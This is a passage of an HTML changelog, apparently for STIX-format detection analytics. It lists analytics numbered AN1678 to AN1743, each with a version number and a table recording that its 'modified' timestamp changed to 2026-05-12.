1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:21:52.654000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1678] Analytic 1678</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:39:29.213000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1681] Analytic 1681</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-02 20:39:33.682000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1682] Analytic 1682</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-02 20:40:39.182000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1683] Analytic 1683</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:51:41.189000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1684] Analytic 1684</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 18:00:59.178000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1693] Analytic 1693</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-02 20:08:42.566000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1694] Analytic 1694</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-02 20:11:59.312000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1697] Analytic 1697</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-12 17:37:17.976000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1698] Analytic 1698</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 23:37:57.341000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1701] Analytic 1701</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 18:17:45.586000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1702] Analytic 1702</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:33:41.747000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1706] Analytic 1706</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-18 19:59:27.650000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN1708] Analytic 1708</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-23 23:00:36.132000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1710] Analytic 1710</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-18 19:46:01.796000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1711] Analytic 1711</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 20:14:18.733000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1712] Analytic 1712</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:39.616000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN1713] Analytic 1713</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-11 16:29:42.519000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1714] Analytic 1714</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-12 17:09:47.656000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1715] Analytic 1715</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 19:26:01.974000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1716] Analytic 1716</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-01 15:33:34.145000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1717] Analytic 1717</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-01 15:39:38.487000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1718] Analytic 1718</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 18:10:00.568000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1719] Analytic 1719</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 18:06:40.461000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1720] Analytic 1720</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 18:13:22.436000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1721] Analytic 1721</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:01:36.709000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1722] Analytic 1722</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-28 17:28:26.921000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1723] Analytic 1723</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-11 16:02:58.868000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1724] Analytic 1724</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-11 16:09:37.177000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1725] Analytic 1725</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-06 16:02:58.850000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1726] Analytic 1726</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 16:26:13.027000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1727] Analytic 1727</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 21:01:31.075000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1728] Analytic 1728</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 19:15:22.491000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1729] Analytic 1729</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 19:20:39.637000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1730] Analytic 1730</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 16:22:36.406000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1731] Analytic 1731</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-01 16:01:38.627000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1732] Analytic 1732</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-01 16:04:16.642000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1733] Analytic 1733</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:22.993000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1734] Analytic 1734</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:21.803000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1737] Analytic 1737</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 18:45:30.914000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1738] Analytic 1738</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 18:49:55.440000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1739] Analytic 1739</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-12-02 15:38:03.766000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1740] Analytic 1740</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-12-04 17:05:14.687000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1741] Analytic 1741</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 20:26:15.372000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1742] Analytic 1742</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 20:37:17.277000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1743] Analytic 1743</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New 